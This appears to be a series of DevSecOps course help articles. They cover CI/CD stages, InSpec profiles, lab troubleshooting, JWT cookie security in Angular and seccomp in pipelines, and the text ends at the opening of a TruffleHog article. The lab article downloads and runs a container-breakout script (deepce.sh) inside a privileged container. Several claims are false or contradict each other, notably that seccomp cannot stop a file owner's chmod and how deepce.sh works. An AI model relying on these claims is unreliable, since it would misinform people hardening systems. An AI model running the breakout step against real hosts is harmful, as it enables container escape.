- Example: A GitHub Actions workflow runs helm upgrade --install myapp ./chart --set image.tag=1.2.0 to roll out the new Docker image to a Kubernetes production cluster, then monitors the rollout status. Release vs. Integration vs. Deploy: What Sets Them Apart? | Aspect | Release | Integration | Deploy | |--------|---------|-------------|--------| | Goal | Create a versioned, packaged artifact ready for distribution. | Ensure multiple code changes work together without breaking the system. | Move the approved artifact into a concrete environment (staging/production). | | When it occurs | After successful build and test stages, before any environment change. | Continuously as branches are merged; often parallel to release preparation. | After the release is approved; can be automated for every release or on a schedule. | | Typical outputs | Tags, release notes, signed binaries, artifact registry entries. | Integrated code base, integration‑test reports, resolved merge conflicts. | Running services, updated infrastructure, database schema changes. | | Key tools | Git tagging, GitHub/GitLab Releases, Nexus/Artifactory. | Pull‑request merges, CI merge checks, integration‑test frameworks. | Helm, Argo CD, Azure Pipelines Release, AWS CodeDeploy. | Understanding these boundaries helps teams avoid bottlenecks—e.g., don’t treat a merge conflict as a “release” problem, and don’t run a full production deployment before the release package is formally approved. DevSecOps Scan Duration Guideline (≤ 10 minutes) Security scans are essential, but they must not stall the pipeline. The 10‑minute rule is a practical benchmark: - What it means: The combined runtime of all security‑related jobs (static analysis, dependency scanning, container image scanning, etc.) should stay under 10 minutes for a typical commit. - Why it matters: Long scans increase feedback latency, encourage developers to bypass security checks, and reduce overall delivery speed. - How to achieve it: 1. 
Select fast tools—many modern scanners (e.g., Trivy, Snyk, OWASP Dependency‑Check) finish in < 3 minutes per job. 2. Parallelize scans—run SAST and container scans in separate jobs that execute concurrently. 3. Scope intelligently—scan only changed files or layers instead of the entire repository each run. 4. Cache results—store previous scan outcomes and re‑use them when code hasn’t changed. If a particular scan consistently exceeds the limit, consider splitting it (e.g., run a quick baseline scan on every PR, then a deeper scan nightly). Tips & Common Questions Tips for a Smooth CI/CD Experience - Keep pipelines declarative (GitLab CI YAML, GitHub Actions workflow files) to make them version‑controlled and auditable. - Fail fast: Stop the pipeline at the first critical error to save time and resources. - Use feature flags to decouple code deployment from feature activation, enabling safer releases. - Monitor pipeline health with dashboards (Grafana, GitLab CI Insights) to spot flaky stages early. Frequently Asked Questions | Question | Answer | |----------|--------| | Do all scans need to be under 10 minutes? | The guideline applies to the total scanning time per pipeline run. Individual scans may be longer if you run them in parallel or on a schedule. | | Can I reuse the same “Release” stage for both staging and production? | Yes—use environment variables or pipeline parameters to differentiate the target (e.g., RELEASE_ENV=staging). | | What’s the difference between “Release” and “Deploy” in GitLab’s default stages? | GitLab’s “release” stage creates a GitLab Release object (tags, changelog). “Deploy” actually pushes the artifact to an environment. | | How do I know if my integration tests are comprehensive enough? | Aim for branch‑coverage ≥ 80 % and include at least one end‑to‑end scenario that spans the critical data flow between services. 
| By mastering each CI/CD stage, distinguishing release/integration/deploy responsibilities, and keeping security scans within the 10‑minute window, you’ll build pipelines that are fast, reliable, and secure—the cornerstone of modern DevSecOps practice. Happy automating!
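
The stages discussed above can be consolidated into a single declarative definition. Here is a minimal GitLab CI sketch, with the two test-stage scan jobs running in parallel to help stay inside the 10‑minute scan budget (job names and helper scripts such as run-sast.sh are illustrative, not from a real course repository):

```yaml
stages: [build, test, release, deploy]

build-job:
  stage: build
  script:
    - npm ci && npm run build
    - docker build -t myapp:1.2.0 .

sast-scan:                    # runs in parallel with dependency-scan,
  stage: test                 # keeping total scan time low
  script: ./run-sast.sh       # illustrative scan script

dependency-scan:
  stage: test
  script: ./run-depscan.sh    # illustrative scan script

release-job:
  stage: release
  script:
    - git tag v1.2.0
    - git push origin v1.2.0

deploy-job:
  stage: deploy
  script: helm upgrade --install myapp ./chart --set image.tag=1.2.0
```

Because both test-stage jobs belong to the same stage, GitLab runs them concurrently by default; the release and deploy stages start only after the whole test stage passes.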

Last updated on Jan 07, 2026

Creating and Managing InSpec Profiles – A Practical Guide for DevSecOps Learners

Creating and Managing InSpec Profiles – A Practical Guide for DevSecOps Learners InSpec is the de‑facto standard for automated compliance testing in modern DevSecOps pipelines. Whether you’re troubleshooting a failing control, building a custom profile for a lab, or simply understanding the role of the inspec.yml metadata file, this article walks you through the essential steps, best‑practice tips, and manual remediation techniques you need to succeed. 1. Manually Fixing InSpec Control Failures Automated remediation is ideal, but there are times when you must address a failure by hand—especially during labs or when a quick fix is required on a remote host. The exact steps depend on the type of control that failed. 1.1 Common Failure Types & Manual Fixes | Failure Category | Typical InSpec Message | Manual Remedy (CLI) | Example Command | |------------------|------------------------|---------------------|-----------------| | File Permissions | File /etc/passwd should be mode 0644 | Adjust permissions with chmod | chmod 0644 /etc/passwd | | File Ownership | File /var/log/app.log should be owned by syslog | Change owner/group with chown | chown syslog:adm /var/log/app.log | | Missing File | File /etc/myapp.conf should exist | Create the file (touch, echo, or copy) | touch /etc/myapp.conf | | Service Not Running | Service nginx should be running | Start/enable the service with systemctl | systemctl start nginx && systemctl enable nginx | | Package Not Installed | Package git should be installed | Install via package manager | apt-get install -y git (Debian) or yum install -y git (RHEL) | | Port Not Listening | Port 443 should be listening | Open the port or start the service that binds to it | firewall-cmd --add-port=443/tcp --permanent && firewall-cmd --reload | 1.2 Remote Remediation Workflow 1. Identify the target host – note the hostname or IP from the InSpec run output. 2. SSH into the host: ssh user@target-host 3. 
Execute the appropriate command (see table above). 4. Re‑run the InSpec profile to confirm the issue is resolved: inspec exec /path/to/profile -t ssh://user@target-host 2. Building a Custom InSpec Profile – Lab 8.5 Walk‑through The “8.5 Lab – How to Create a Custom InSpec Profile” asks you to create a profile named Challenge and later add it to a GitLab repository. Below is a concise step‑by‑step guide. 2.1 Initialise the Profile inspec init profile Challenge The command generates a directory structure similar to: Challenge/ ├─ controls/ │ └─ example.rb ├─ inspec.yml └─ README.md 2.2 Add Variables and Target Host In the lab you used two variables (e.g., app_user and app_port). Define them in controls/example.rb or a dedicated attributes.yml file: # controls/example.rb app_user = input('app_user', value: 'myapp') app_port = input('app_port', value: 8080) describe user(app_user) do it { should exist } end describe port(app_port) do it { should be_listening } end When you run the profile, pass the variables via the CLI or a yaml file: inspec exec Challenge -t ssh://user@host \ --input app_user=deploy --input app_port=9090 2.3 Understanding the “Hint” – No Explicit Target The lab hint uses the check and exec methods inside the Challenge profile. Those methods are generic; they do not embed a specific host. Instead, the target host is supplied at runtime by the GitLab CI job (.gitlab-ci.yml). The CI pipeline defines the INSPEC_TARGET variable, and the job runs: inspec exec Challenge -t $INSPEC_TARGET Therefore, the profile will be evaluated against any host you configure in the pipeline, not just a hard‑coded target. 2.4 Commit and Push to GitLab git add . git commit -m "Add Challenge profile" git push origin main The profile is now part of the repository and will be automatically executed by the compliance job defined in .gitlab-ci.yml. 3. The Role of inspec.yml Every InSpec profile includes an inspec.yml file that stores metadata and configuration. 
It is the profile’s “identity card” and is used by InSpec, the InSpec Marketplace, and CI/CD tools. 3.1 Core Fields | Key | Description | Example | |-----|-------------|---------| | name | Unique identifier (used when publishing) | my-company/ssh-hardening | | title | Human‑readable title | SSH Hardening Profile | | version | Semantic version of the profile | 1.2.3 | | maintainer | Person or team responsible | DevSecOps Team | | summary | One‑sentence overview | Ensures SSH follows CIS benchmarks | | description | Detailed explanation (optional) | This profile checks ... | | license | SPDX license identifier | Apache-2.0 | | supports | OS families and releases the profile targets | - os-family: linux release: 20.04 | | depends | External profiles this profile relies on | - name: ssh-hardening url: https://github.com/dev-sec/ssh-hardening | 3.2 Why It Matters - Discovery – Tools like the InSpec Marketplace list profiles based on these fields. - Versioning – CI pipelines can enforce a minimum version (>= 1.0.0). - Dependency Management – depends ensures required sub‑profiles are fetched automatically. - Documentation – Readers instantly understand the profile’s purpose without digging into the code. 4. Common Questions & Quick Tips Q1: Can I fix a failing control without writing a script? A: Yes. Use the manual commands listed in Section 1.1. After fixing, re‑run the profile to verify. Q2: Do I need to hard‑code the target host inside the profile? A: No. Provide the target at runtime (CLI, CI variable, or inspec exec -t <target>). This keeps the profile reusable across environments. Q3: What happens if I omit inspec.yml? A: InSpec will still run, but you lose metadata, versioning, and dependency resolution. Publishing to the Marketplace will also fail. Q4: Where can I find more detailed remediation guides? 
A: - Official InSpec docs – https://www.inspec.io/docs/ - Chef InSpec GitHub Wiki – https://github.com/inspec/inspec/wiki - CIS Benchmarks (PDFs) – https://www.cisecurity.org/cis-benchmarks/ 5. Bottom Line Creating robust InSpec profiles and manually addressing control failures are core skills for any DevSecOps practitioner. By understanding the metadata in inspec.yml, leveraging variables, and knowing exactly how to remediate common failures, you can accelerate lab work, pass certification exams, and bring real‑world compliance automation to production environments. Happy testing!
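
For quick reference, a minimal inspec.yml that combines the core fields from Section 3.1 for the lab’s Challenge profile might look like this (all values are examples, not taken from the actual lab solution):

```yaml
name: challenge
title: Challenge Profile
version: 0.1.0
maintainer: DevSecOps Learner
summary: Example compliance checks for Lab 8.5
license: Apache-2.0
supports:
  - os-family: linux
```

With this metadata in place, `inspec check Challenge` can validate the profile structure before you push it to GitLab.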

Last updated on Jan 06, 2026

Common Lab Technical Challenges in DevSecOps — Causes, Solutions, and Best‑Practice Tips

Common Lab Technical Challenges in DevSecOps — Causes, Solutions, and Best‑Practice Tips Introduction Hands‑on labs are the backbone of any DevSecOps certification program. They let learners experiment with container hardening, CI/CD pipelines, and vulnerability‑scanning tools in a safe environment. However, students often encounter roadblocks that can stall progress and create frustration. This article consolidates the most frequently reported lab issues, explains why they happen, and provides clear, step‑by‑step remediation. By understanding the underlying mechanics—such as Linux seccomp profiles, artifact generation, CI/CD replication, and container‑based exploit scripts—you’ll be able to troubleshoot faster and focus on mastering the core concepts of secure software delivery. 1. Seccomp Profile Does Not Block chmod What’s happening? - Owner privilege – In Linux, the file owner can always change file permissions with chmod, regardless of a seccomp filter. - Non‑owner attempts – When a user tries to chmod a file owned by another UID, the seccomp rule you defined (chmod syscall block) becomes effective and the operation is denied. How to verify the behavior # As the file owner (should succeed) touch myfile chmod 600 myfile # works even with seccomp block # Switch to a different user (should be blocked) sudo -u nobody chmod 600 myfile # → Permission denied (seccomp active) Recommended solution 1. Document the limitation in your lab instructions so learners know the rule only applies to non‑owners. 2. Add a non‑owner test case to demonstrate the filter in action. 3. If you need to block chmod for the owner as well, consider using AppArmor or SELinux policies instead of seccomp, because seccomp cannot override file‑ownership semantics. 2. 
Artifacts Not Generated After Following the Guide Why the simple fix sometimes fails The “artifact not generated” symptom usually stems from deeper pipeline or environment issues, such as: - Missing environment variables required by the build script. - Incomplete dependency installation (e.g., npm install or pip install not executed). - File‑system permission problems that prevent the runner from writing to the output directory. Step‑by‑step troubleshooting checklist | # | Action | Expected Result | |---|--------|-----------------| | 1 | Inspect the job logs for any “permission denied” or “command not found” messages. | Clear error messages pinpointing the failure point. | | 2 | Confirm required variables (e.g., ARTIFACT_PATH, BUILD_MODE) are exported in the pipeline definition. | echo $ARTIFACT_PATH prints a valid directory. | | 3 | Run the build locally inside the same Docker image used by the CI runner. | Artifact appears in the expected location. | | 4 | Check directory permissions (chmod 775 on the output folder). | Runner can write files without error. | | 5 | Re‑trigger the pipeline after fixing any identified issue. | Artifact is produced and archived. | If the problem persists after these steps, revisit the lab’s “deep dive” sections where the underlying container runtime and volume mounting concepts are explained. 3. Replicating Production Machines in CI/CD – Copy‑Paste Pitfalls The common misconception Many learners copy production Dockerfiles or configuration files verbatim into the CI/CD pipeline, assuming the environment will behave identically. In practice, the build context, runtime arguments, and secret handling differ between a live production host and an isolated CI runner. Best‑practice workflow for accurate replication 1. Create a dedicated “ci‑base” image that mirrors the production OS and installed packages but excludes production secrets. 2. 
Parameterize environment‑specific values (e.g., database URLs, API keys) using CI variables rather than hard‑coding them. 3. Mount only the required volumes in the CI job; avoid copying the entire /etc or /var directories. 4. Validate the image with a quick smoke test before running the full test suite. Example snippet (GitHub Actions) jobs: build-and-test: runs-on: ubuntu-latest container: image: myorg/ci-base:latest env: DB_HOST: ${{ secrets.DB_HOST }} API_TOKEN: ${{ secrets.API_TOKEN }} steps: - uses: actions/checkout@v3 - name: Install dependencies run: ./install.sh - name: Run tests run: ./run-tests.sh By following this pattern, you achieve a faithful production replica while keeping the CI environment secure and reproducible. 4. Running deepce.sh – Understanding the Container Exploit Script What is deepce.sh? deepce.sh is a demonstration script that attempts to privilege‑escalate from a container to its host. It does so by: - Pulling a lightweight Alpine Linux image (the script’s default payload). - Executing a series of known container breakout techniques (e.g., abusing CAP_SYS_ADMIN, mis‑configured mounts). - Reporting whether the container is vulnerable. Proper execution steps 1. Start an interactive shell inside the target container docker run -it --privileged --pid=host --cgroupns=host alpine /bin/sh Note: The --privileged flag is required only for demonstration; real‑world labs use a restricted container to show why the exploit fails. 2. Download and run the script inside that shell wget https://example.com/deepce.sh -O deepce.sh chmod +x deepce.sh ./deepce.sh 3. Interpret the output - Success – The script prints a message like “Host shell obtained!” indicating a vulnerable configuration. - Failure – Errors such as “mount namespace not isolated” show that the container is properly hardened. Why the script pulls an Alpine image The Alpine image serves as a payload that the script tries to execute on the host. 
If the container is insecure, the payload runs with host privileges, demonstrating the risk. In a secure setup, the download occurs but the payload never gains execution rights. Key takeaway Running deepce.sh inside the container shell is essential. Executing it on the host will only fetch the Alpine image without any exploitation attempt, which explains the confusion many learners experience. Common Questions & Quick Tips | Question | Quick Answer | |----------|--------------| | Can I block chmod for the file owner with seccomp? | No. Seccomp cannot override ownership rights; use MAC frameworks instead. | | Artifacts still missing after fixing permissions? | Verify the CI runner’s working directory and ensure the build script actually writes to the path you’re archiving. | | Is copying production Dockerfiles to CI safe? | Only if you remove secrets and adapt environment variables; otherwise, it can expose credentials. | | Do I need --privileged to run deepce.sh? | For the demo you do not need it; the script is meant to fail on a properly restricted container. | Pro‑Tip Checklist Before Submitting a Lab - ☐ Confirm you are inside the intended container (run cat /proc/1/cgroup). - ☐ Verify environment variables and file permissions match the lab guide. - ☐ Run a dry‑run of the build script locally to catch missing dependencies. - ☐ Review the seccomp JSON to ensure the correct syscalls are blocked. Conclusion Technical hiccups are a natural part of learning DevSecOps, but they also present valuable teaching moments. By understanding the why behind each issue—owner privileges with seccomp, hidden pipeline dependencies, the nuances of reproducing production environments, and the mechanics of container‑breakout scripts—you’ll not only solve the immediate lab problem but also build a stronger foundation for real‑world secure development pipelines. Keep this guide handy, follow the systematic troubleshooting steps, and you’ll turn every obstacle into a learning win.
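
The checklist in Section 2 can be partly automated. This sketch, with an illustrative variable name and default directory, fails fast if the artifact output directory cannot be written, instead of discovering the problem after a long build:

```shell
#!/bin/sh
# Hypothetical artifact directory used by the build (example default value).
ARTIFACT_PATH="${ARTIFACT_PATH:-./dist}"

# Create the directory if it is missing; abort early if that fails.
mkdir -p "$ARTIFACT_PATH" || { echo "cannot create $ARTIFACT_PATH"; exit 1; }

# The CI runner must be able to write here, or no artifact will be archived.
if [ -w "$ARTIFACT_PATH" ]; then
  echo "artifact path OK: $ARTIFACT_PATH"
else
  echo "artifact path not writable: $ARTIFACT_PATH" >&2
  exit 1
fi
```

Running this as the first step of the build job surfaces permission problems in the job log with a clear message, rather than a silent missing-artifact failure at the end.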

Last updated on Jan 06, 2026

Managing JWT Cookies, CORS, and Security in Angular Applications

Managing JWT Cookies, CORS, and Security in Angular Applications When building modern Single‑Page Applications (SPAs) with Angular, developers often face the question of how to store and transmit JSON Web Tokens (JWTs) safely. Should the token live in a cookie, in local storage, or be sent in an Authorization: Bearer … header? How do CORS, HttpOnly, SameSite, and the Angular withCredentials flag interact? This article walks you through the security implications, best‑practice patterns, and practical code snippets so you can protect your Angular app from XSS and CSRF attacks while keeping authentication smooth. 1. Why JWTs Are Usually Sent in an Authorization Header - Stateless authentication – The server validates the token on each request without needing a session store. - Clear separation of concerns – Tokens are treated as credentials, not as UI data, so they belong in request headers. - Built‑in support – Most back‑end frameworks (Express, Spring, .NET, etc.) provide middleware that reads Authorization: Bearer <jwt>. If you decide to keep the JWT in a cookie, you must understand the trade‑offs. 2. Storing JWTs in Cookies 2.1 HttpOnly vs. Accessible Cookies | Attribute | Effect | When to use | |-----------|--------|-------------| | HttpOnly | Browser does not expose the cookie to document.cookie or JavaScript. | Ideal for preventing XSS theft of the token. | | No HttpOnly | JavaScript can read the cookie, allowing you to copy it into an Authorization header. | Needed only if the back‑end requires the token in a header and you cannot change that design. Not recommended because it opens XSS risk. | Bottom line: If your API expects the JWT in a header, store the token outside of a cookie (e.g., in memory or a secure storage) or redesign the API to accept the cookie directly. 
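
When the server does set the JWT as a hardened cookie, the login response carries a header like the one below (the token value is a placeholder; the SameSite attribute is explained in the next section):

```http
Set-Cookie: jwt=<token>; HttpOnly; Secure; SameSite=Lax; Path=/
```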
2.2 SameSite – The First Line of Defense Against CSRF | SameSite value | Browser behavior | Recommended use | |----------------|------------------|-----------------| | Strict | Cookie is sent only for same‑site navigation (no cross‑origin requests). | Best security, but may break legitimate third‑party embeds. | | Lax (default in modern browsers) | Cookie is sent on top‑level GET navigation, but not on cross‑origin subresource requests such as XHR/fetch, images, or iframes. | Good balance for most SPAs. | | None | Cookie is sent on all cross‑origin requests if Secure is also set. | Needed only for true cross‑origin APIs, but must be combined with CSRF tokens. | Setting SameSite=Lax (or Strict) mitigates the classic Cross‑Site Request Forgery (CSRF) scenario where a malicious site forces the browser to submit a request that automatically includes the JWT cookie. 3. Angular’s withCredentials Flag this.http.get('https://api.example.com/profile', { withCredentials: true }) - Purpose – Tells the browser to include cookies, Authorization headers, and TLS client certificates on a cross‑origin request. - When it matters – If your Angular app is served from app.example.com and the API lives on api.example.com, the request is cross‑origin. Without withCredentials: true, the browser won’t send the JWT cookie even if it exists. Important notes 1. Same‑origin requests (e.g., https://app.example.com/api) automatically include cookies; withCredentials is unnecessary. 2. The HttpOnly flag does not affect whether the cookie is sent—only whether JavaScript can read it. For cross‑origin XHR/fetch, the cookie is attached only when the request is allowed to carry credentials (withCredentials: true); HttpOnly itself never prevents sending. 3. CORS pre‑flight – The server must respond with Access-Control-Allow-Credentials: true and explicitly list allowed origins (wildcard * is not allowed when credentials are used). 4. 
Practical Implementation Scenarios 4.1 Preferred: JWT in HttpOnly Cookie, API Reads Cookie Directly Server (Express example) app.use(cookieParser()); app.get('/api/user', (req, res) => { const token = req.cookies['jwt']; // HttpOnly cookie if (!token) return res.sendStatus(401); // verify token … res.json({ name: 'Alice' }); }); Angular service @Injectable({ providedIn: 'root' }) export class UserService { constructor(private http: HttpClient) {} getProfile() { return this.http.get<User>('/api/user', { withCredentials: true }); } } Cookie attributes: HttpOnly; Secure; SameSite=Lax; Path=/; Result – The JWT never touches JavaScript, eliminating XSS exposure, while withCredentials ensures the cookie is sent on cross‑origin calls. 4.2 When the API Demands a Bearer Header (Legacy) Work‑around (not recommended) 1. Store the token in memory after login (e.g., a service property). 2. Attach it to every request via an HTTP interceptor. @Injectable() export class JwtInterceptor implements HttpInterceptor { constructor(private auth: AuthService) {} intercept(req: HttpRequest<any>, next: HttpHandler) { const token = this.auth.getToken(); // in‑memory, never persisted if (token) { const cloned = req.clone({ setHeaders: { Authorization: `Bearer ${token}` }, }); return next.handle(cloned); } return next.handle(req); } } Security tip: Because the token lives only in memory, a page reload clears it, forcing the user to re‑authenticate—this reduces the window for XSS theft. 5. Defending Against XSS & CSRF 5.1 XSS Mitigation - Content Security Policy (CSP) – Restrict script sources (script-src 'self'), block inline scripts ('unsafe-inline'), and enable nonce‑based scripts. - Framework auto‑escaping – Angular’s template binding ({{ value }}) automatically HTML‑escapes output. Avoid innerHTML unless you sanitize first. - Sanitize user input – Use Angular’s DomSanitizer for any dynamic HTML. 5.2 CSRF Mitigation - SameSite cookies (Lax or Strict) – Primary defense. 
- Double‑submit cookie – Send a random token in a non‑HttpOnly cookie and echo it in a custom header (X-CSRF-Token). - Anti‑CSRF middleware – Many back‑ends provide built‑in CSRF validation (e.g., csurf for Express). 6. Common Questions & Tips | Question | Answer | |----------|--------| | Do I need withCredentials for same‑origin calls? | No. Browsers automatically include same‑origin cookies. | | Can I set SameSite=None without Secure? | No. Modern browsers reject SameSite=None unless the cookie is also marked Secure. | | What happens if a JWT cookie is HttpOnly and I try to read it in Angular? | You cannot read it via document.cookie. Instead, let the server read the cookie and return the needed data. | | Is storing JWT in localStorage safe? | It is vulnerable to XSS because any script can read localStorage. Prefer HttpOnly cookies when possible. | | How to test CORS with credentials? | Use browser dev tools → Network tab. Look for Access-Control-Allow-Credentials: true in the response and verify the request includes the Cookie header. | Quick checklist before launch - [ ] JWT stored in HttpOnly, Secure, SameSite=Lax cookie. - [ ] API reads the token from the cookie (or redesign to accept header). - [ ] Angular HTTP calls use { withCredentials: true } for cross‑origin APIs. - [ ] Server CORS config includes Access-Control-Allow-Credentials: true and a specific Access-Control-Allow-Origin. - [ ] CSP header is enabled (Content-Security-Policy: default-src 'self'; script-src 'self'). - [ ] Run an XSS scanner (e.g., OWASP ZAP) and a CSRF test suite. 7. Takeaway Storing JWTs in HttpOnly, SameSite‑protected cookies and letting the server read them directly gives you the strongest defense against XSS while still supporting seamless authentication for Angular SPAs. Use Angular’s withCredentials flag only when you need to send those cookies across origins, and always pair it with proper CORS headers and a robust CSP. 
By following these patterns, you can build Angular applications that are both user‑friendly and resilient against the most common web‑security threats.
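
For the cross-origin case, the CORS items in the launch checklist translate into response headers like these (the origin shown is an example; remember that a wildcard origin is not allowed with credentials):

```http
Access-Control-Allow-Origin: https://app.example.com
Access-Control-Allow-Credentials: true
Vary: Origin
```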

Last updated on Jan 07, 2026

Docker Image Declaration, Seccomp Profiles, and Handling Failures in GitHub Actions

Docker Image Declaration, Seccomp Profiles, and Handling Failures in GitHub Actions Learn why certain Docker image declarations don’t work in CI/CD pipelines, how seccomp filters affect chown/chmod, and the best ways to allow failures in GitHub Actions. Introduction When you start building DevSecOps pipelines, you quickly discover that small configuration details can have a big impact on security and reliability. This article explains three common stumbling blocks: 1. Why you can’t declare a Docker image up‑front for certain hysnsec images – the difference between static image pulls and dynamic builds in GitLab CI. 2. How Seccomp profiles influence system calls such as chown and chmod, and why those calls sometimes succeed and sometimes fail. 3. How to let a step or job fail gracefully in GitHub Actions using continue-on-error and conditional expressions. By the end of the guide you’ll be able to write more robust CI/CD definitions, troubleshoot Seccomp‑related errors, and keep your pipelines running even when non‑critical steps break. 1. Declaring Docker Images in GitLab CI – Why “Up‑Front” Doesn’t Always Work 1.1 What “declare the image up‑front” means In a .gitlab-ci.yml file you can specify an image in two ways: # 1️⃣ Static declaration (up‑front) image: hysnsec/bandit:latest # 2️⃣ Dynamic declaration (inside a job) job_name: script: - docker run --rm -v $(pwd):/src hysnsec/bandit -r /src -f json -o /src/bandit-output.json The first approach tells GitLab Runner to pull the image once before any job starts. The second runs the image inside the job’s script. 1.2 Why the static approach fails for some hysnsec images | Reason | Explanation | |--------|-------------| | Image requires runtime arguments | Many hysnsec images expect volume mounts (-v $(pwd):/src) or environment variables that are only known at job execution time. Declaring the image alone provides none of these, causing the container to exit immediately. 
| Custom entrypoint logic | Some images replace the default entrypoint with a wrapper script that expects parameters (e.g., a path to scan). Without those parameters the container cannot start correctly. |
| Security restrictions | GitLab’s shared runners may block privileged operations required by the image when it is pulled as the default environment. Running the image explicitly inside script lets you add --privileged or other flags if needed. |

Bottom line: Use a static image: declaration only when the container can run without additional runtime configuration. For security‑focused images like those from hysnsec, it’s safer to invoke them inside the job’s script.

1.3 Quick reference – When to use each style

- Static image: – Simple unit tests, language runtimes, linting tools that need no extra mounts.
- Dynamic docker run – Scanners, build tools, or any image that requires volumes, environment variables, or special flags.

2. Seccomp Profiles – Why chown and chmod May Appear to Work or Fail

Seccomp (Secure Computing Mode) filters the system calls a container can execute. A typical DevSecOps lab will provide a custom seccomp JSON that blocks risky calls while allowing the rest.

2.1 Understanding the behavior

| Scenario | Seccomp rule | Observed result | Why it happens |
|----------|--------------|-----------------|----------------|
| mkdir blocked | mkdir syscall denied | adduser fails at directory creation | The user‑creation flow tries to create /home/abc. The blocked mkdir aborts the process, producing “Operation not permitted”. |
| chown blocked | chown syscall denied | adduser fails after directory is created | The home directory is created, but the subsequent chown 1000:1000 /home/abc is blocked, causing the same error message. |
| chmod blocked | chmod syscall denied | adduser fails during permission change | After mkdir, the tool attempts chmod 488 /home/abc. The denied syscall stops the flow. |

When the seccomp profile does not block chown or chmod, those calls succeed because the container’s process has the required capabilities (usually root inside the container).

2.2 Practical example

```
# Inside a container with a restrictive seccomp profile
root@container:/# adduser abc
Adding user `abc' ...
Creating home directory `/home/abc' ...
Stopped: chown 1000:1000 /home/abc: Operation not permitted
```

If you remove the chown rule from the profile:

```json
{
  "syscalls": [
    { "name": "chmod", "action": "SCMP_ACT_ALLOW" },
    { "name": "mkdir", "action": "SCMP_ACT_ALLOW" }
  ]
}
```

(chown is omitted here, so the profile’s defaultAction applies to it.) The same command succeeds because the kernel no longer blocks the chown syscall.

2.3 Tips for working with seccomp

1. Start with a permissive profile (SCMP_ACT_ALLOW for everything) and iteratively add blocks.
2. Log denied syscalls – keep the profile applied and inspect dmesg or the kernel audit log for seccomp denials; running with --security-opt seccomp=unconfined is a quick way to confirm whether the profile is the cause at all.
3. Remember ownership matters – chmod succeeds only for the file’s owner (or root). Root inside the container can always change permissions; non‑root users are additionally subject to normal file‑permission checks, independent of the profile.
4. Test with real user‑creation commands (useradd, adduser) to verify that the profile doesn’t unintentionally break provisioning steps.

3. Allowing Failures in GitHub Actions – continue-on-error and Conditional Execution

In CI pipelines, some steps are “nice‑to‑have” (e.g., security scans) and should not break the whole workflow.
GitHub Actions provides two mechanisms:

3.1 continue-on-error – Mark a step or job as successful even if it fails

```yaml
sast:
  runs-on: ubuntu-20.04
  needs: test
  steps:
    - uses: actions/checkout@v2
    - name: Run Bandit scan
      run: |
        docker run --rm -v $(pwd):/src hysnsec/bandit -r /src -f json -o /src/bandit-output.json
      continue-on-error: true  # <-- step never fails the job
    - name: Upload results
      uses: actions/upload-artifact@v2
      with:
        name: Bandit
        path: bandit-output.json
      if: always()  # ensures artifact upload runs even if previous step failed
```

Result: The job finishes with a green checkmark, but the scan’s exit code is still recorded in the logs.

3.2 if: always() – Run a step regardless of previous outcome

Useful for cleanup or artifact collection:

```yaml
- name: Cleanup temporary files
  run: rm -rf /tmp/tmpfile
  if: always()
```

3.3 Combining both for a “soft‑fail” job

```yaml
sast:
  runs-on: ubuntu-20.04
  needs: test
  continue-on-error: true  # entire job never fails the workflow
  steps:
    - uses: actions/checkout@v2
    - run: docker run --rm -v $(pwd):/src hysnsec/bandit -r /src -f json -o /src/bandit-output.json
    - uses: actions/upload-artifact@v2
      with:
        name: Bandit
        path: bandit-output.json
      if: always()
```

3.4 When to use each approach

| Situation | Recommended setting |
|-----------|---------------------|
| Optional security scan – you want a report but don’t want to block the pipeline | continue-on-error: true on the scan step |
| Mandatory build step – failure must stop the pipeline | Omit continue-on-error; use default behavior |
| Always‑run cleanup – regardless of success/failure | if: always() on the cleanup step |

Common Questions & Quick Tips

- Q: Can I override a seccomp profile at runtime?
  A: Yes. Use --security-opt seccomp=/path/to/profile.json with docker run. For GitHub Actions, add it to the run command.
- Q: Why does my GitLab job still fail even with continue-on-error?
  A: continue-on-error is a GitHub Actions feature. In GitLab you need allow_failure: true on the job definition.
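For reference, the GitLab equivalent is a single key on the job itself. A minimal sketch (the job name and script are placeholders, not part of any specific lab):

```yaml
sast:
  stage: test
  script:
    - ./run-scan.sh       # hypothetical scan script
  allow_failure: true     # job may fail without failing the pipeline
```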
- Tip: When testing seccomp changes, run the container with --security-opt seccomp=unconfined first to confirm that the issue is truly a blocked syscall.
- Tip: Keep your GitHub Actions YAML tidy by extracting reusable steps into reusable workflows or composite actions – especially when you repeatedly apply continue-on-error.

Conclusion

Understanding the nuances of Docker image declaration, seccomp filtering, and failure handling makes your DevSecOps pipelines both secure and resilient. Declare images dynamically when they need runtime parameters, fine‑tune seccomp profiles to block only the truly dangerous syscalls, and use continue-on-error together with conditional if: always() to keep non‑critical steps from derailing the entire workflow. Apply these best practices, and you’ll spend less time debugging and more time delivering secure software.
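As a companion to the seccomp discussion above, a profile can also be inspected programmatically before you ever run a container. This is a minimal sketch in plain Python; it assumes the Docker‑style seccomp JSON layout (a top‑level `defaultAction` plus a `syscalls` list whose entries use either the older `name` key or the newer `names` list) and is not tied to any specific lab profile:

```python
import json

def syscall_action(profile: dict, name: str) -> str:
    """Return the seccomp action that applies to the given syscall name.

    Walks the profile's `syscalls` rules; if no rule matches, the
    profile's `defaultAction` applies (assumed allow if absent).
    """
    for rule in profile.get("syscalls", []):
        names = list(rule.get("names", []))
        if rule.get("name"):          # older single-name format
            names.append(rule["name"])
        if name in names:
            return rule["action"]
    return profile.get("defaultAction", "SCMP_ACT_ALLOW")

# Synthetic profile mirroring the article's example: mkdir/chmod allowed,
# everything else (including chown) denied by the default action.
profile = json.loads("""
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "syscalls": [
    { "names": ["chmod", "mkdir"], "action": "SCMP_ACT_ALLOW" }
  ]
}
""")

print(syscall_action(profile, "mkdir"))  # SCMP_ACT_ALLOW
print(syscall_action(profile, "chown"))  # SCMP_ACT_ERRNO -> the adduser failure above
```

Running this against your lab's profile shows at a glance which call (mkdir, chown, or chmod) will abort the `adduser` flow.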

Last updated on Jan 06, 2026

TruffleHog Scanning Options & Repository Path: How to Use `file:///` and `--repo_path` in Docker‑Based Labs

TruffleHog Scanning Options & Repository Path: How to Use file:/// and --repo_path in Docker‑Based Labs

Learn exactly what file:/// points to, how the --repo_path flag works inside a container, and how to control branch scanning with TruffleHog.

Introduction

TruffleHog is a popular open‑source tool for detecting secrets (API keys, passwords, tokens, etc.) in Git repositories. In many DevSecOps labs the tool runs inside a Docker container, and learners often wonder:

- What does the file:/// URL refer to – the host filesystem or the container’s filesystem?
- Why does the command use a --repo_path flag that isn’t listed in trufflehog --help?
- Can we replace --repo_path with a plain git URL?
